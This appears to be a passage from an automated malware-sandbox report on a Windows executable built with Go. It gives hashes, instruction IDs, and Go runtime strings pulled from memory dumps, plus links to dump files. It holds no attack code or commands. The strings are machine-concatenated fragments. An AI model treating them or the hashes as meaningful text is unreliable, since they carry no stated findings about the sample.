                                                              • Opcode ID: 35bfc13783085809ff100db792aae9c6576bf432ec796ad2e4c0f2543c7307a5
                                                              • Instruction ID: d05530f15c22603299acca85900aed5cb2d67bbfa8ea3cc37d9bd2921fc2a2af
                                                              • Opcode Fuzzy Hash: 35bfc13783085809ff100db792aae9c6576bf432ec796ad2e4c0f2543c7307a5
                                                              • Instruction Fuzzy Hash: E95105B42097118FD340EF29D58575EBBE0FF48708F808A2EE88887352E7389944DF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileunexpected )unknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid heap_marked= , xrefs: 00434566
                                                              • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestart copied file: %wstartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/br, xrefs: 00434662
                                                              • m->p= next= p->m= prev= span=(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPr, xrefs: 00434588
                                                              • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=$WINDIR\rss%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004345D4
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.621851748.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000002A.00000002.621834680.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 0000002A.00000002.625598433.00000000008C3000.00000040.00020000.sdmp Download File
                                                              • Associated: 0000002A.00000002.625616282.00000000008D1000.00000040.00020000.sdmp Download File
                                                              • Associated: 0000002A.00000002.625632697.00000000008D4000.00000040.00020000.sdmp Download File
                                                              • Associated: 0000002A.00000002.625643137.00000000008D7000.00000040.00020000.sdmp Download File
                                                              • Associated: 0000002A.00000002.625660103.00000000008D8000.00000080.00020000.sdmp Download File
                                                              • Associated: 0000002A.00000002.625676744.00000000008D9000.00000004.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=$WINDIR\rss%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPr$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestart copied file: %wstartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileunexpected )unknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid heap_marked=
                                                              • API String ID: 0-2527030486
                                                              • Opcode ID: 8b97a09f3ca774cfadb3114678e64e069106bda406771d947f6698ffa7ea8ee8
                                                              • Instruction ID: 7f80efca96c7c0026b2bbb8fce386263dcbd652a6508ac33117d8161810f2d9f
                                                              • Opcode Fuzzy Hash: 8b97a09f3ca774cfadb3114678e64e069106bda406771d947f6698ffa7ea8ee8
                                                              • Instruction Fuzzy Hash: CE51D4B46083158FD704EF25D185B6ABBE0BF88308F41996EE48987352D778D888DF96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%